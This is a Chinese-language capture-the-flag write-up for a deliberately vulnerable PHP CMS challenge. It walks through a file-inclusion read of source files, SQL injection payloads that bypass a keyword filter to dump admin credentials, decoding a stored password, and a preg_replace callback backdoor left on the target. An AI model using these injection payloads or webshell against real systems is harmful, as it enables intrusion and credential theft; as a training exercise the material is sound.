http://cms.nuptzj.cn/

题解:

MzAzMTY3YWQxZDlmZmUyNGIxOWNjZWI1OWY4NzA3ZmU=

base64解密

303167ad1d9ffe24b19cceb59f8707fe

md5解密

undefined 

 能点的都点一遍以后

 

 CMS说明的URL

http://cms.nuptzj.cn/about.php?file=sm.txt

访问

http://cms.nuptzj.cn/sm.txt

存在config.php,index.php,passencode.php,say.php五个文件

admin的表结构(可能存在SQL注入)

从URL

http://cms.nuptzj.cn/about.php?file=sm.txt

可知,存在文件包含

可以获取网站文件

获取所有已知文件

about.php

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<?php 
	$file=$_GET['file']; 
	if($file=="" || strstr($file,'config.php'))
	{ 
		echo "file参数不能为空!"; exit(); 
	}
	else
	{ 
		$cut=strchr($file,"loginxlcteam"); 
		if($cut==false)
		{
			$data=file_get_contents($file); 
			$date=htmlspecialchars($data); 
			echo $date; 
		}
		else
		{ 
			echo "<script>alert('敏感目录,禁止查看!但是。。。')</script>"; 
		} 
	}

存在文件loginxlcteam

访问

http://cms.nuptzj.cn/loginxlcteam/

发现是后台

用户名、密码未知

返回index.php

有留言搜索功能,可能存在数据库查询

直接使用功能

审查元素

发现文件so.php

下载so.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搜索留言</title> 
</head> 
<body> 
    <center> 
        <div id="say" name="say" align="left" style="width:1024px"> 
<?php 
    if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser")
    { 
        echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~'; 
        exit(); 
    } 
    $id=$_POST['soid']; 
    include 'config.php'; 
    include 'antiinject.php'; 
    include 'antixss.php'; 
    $id=antiinject($id); 
    $con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error()); 
    mysql_select_db($db_name,$con); 
    $id=mysql_real_escape_string($id); 
    $result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id"); 
    $rs=mysql_fetch_array($result); 
    echo htmlspecialchars($rs['nice']).':<br/>&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />'; 
    mysql_free_result($result); 
    mysql_free_result($file); 
    mysql_close($con); 
?> 
        </div> 
    </center> 
</body> 
</html>

发现antiinject.phpantixss.php两个文件

antiinject.php

<?php 
	function antiinject($content){ 
		$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","="); 
		$info=strtolower($content); 
		for($i=0;$i<=count($keyword);$i++){
			$info=str_replace($keyword[$i], '',$info); 
		} 
		return $info; 
	} 
?>

作用:防止SQL注入

antixss.php

<?php 
	function antixss($content){ 
		preg_match("/(.*)\[a\](.*)\[\/a\](.*)/",$content,$url); 
		$key=array("(",")","&","\\","<",">","'","%28","%29"," on","data","src","eval","unescape","innerHTML","document","appendChild","createElement","write","String","setTimeout","cookie");//因为太菜,很懒,所以。。。(过滤规则来自Mramydnei) 
		$re=$url[2]; 
		if(count($url)==0){ 
			return htmlspecialchars($content); 
		}else{ 
			for($i=0;$i<=count($key);$i++){ 
				$re=str_replace($key[$i], '_',$re); 
			} 
		return htmlspecialchars($url[1],ENT_QUOTES).'<a href="'.$re.'">'.$re.'</a>'.htmlspecialchars($url[3],ENT_QUOTES); 
		} 
	} 
?>

作用:预防XSS攻击

antiinject.php

过滤了敏感词,可以用双重绕过

过滤了空格,可以用/**/绕过

 SQL语句源代码

$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");

SQL注入

soid=1/**/UNunionION/**/SELselectECT/**/1,2,3,4

其中

USER-AGENT=Xlcteam Browser

 SQL注入

soid=1/**/an=d/**/0/**/unio=n/**/selec=t/**/null,usernam=e,userpas=s,null/**/fro=m/**/admi=n

 passencode.php

<?php 
	function passencode($content){ 
		$pass=urlencode($content); 
		$array=str_split($content); 
		$pass=""; 
		for($i=0;$i<count($array);$i++){ 
			if($pass!=""){ 
				$pass=$pass." ".(string)ord($array[$i]); 
			}else{ 
				$pass=(string)ord($array[$i]); 
			} 
		} 
		return $pass; 
	} 
?>

作用:将用户输入的密码存储为ASCII码的形式

[102 ,117 ,99 ,107 ,114 ,117 ,110 ,116 ,117]转换[***runtu]

 用户名:admin    密码:***runtu

登录

xlcteam.php

<?php 
	$e = $_REQUEST['www']; 
	$arr = array($_POST['wtf'] => '|.*|e',); 
	array_walk($arr, $e, ''); 
?>

回调后门 

 

获取文件目录 

flag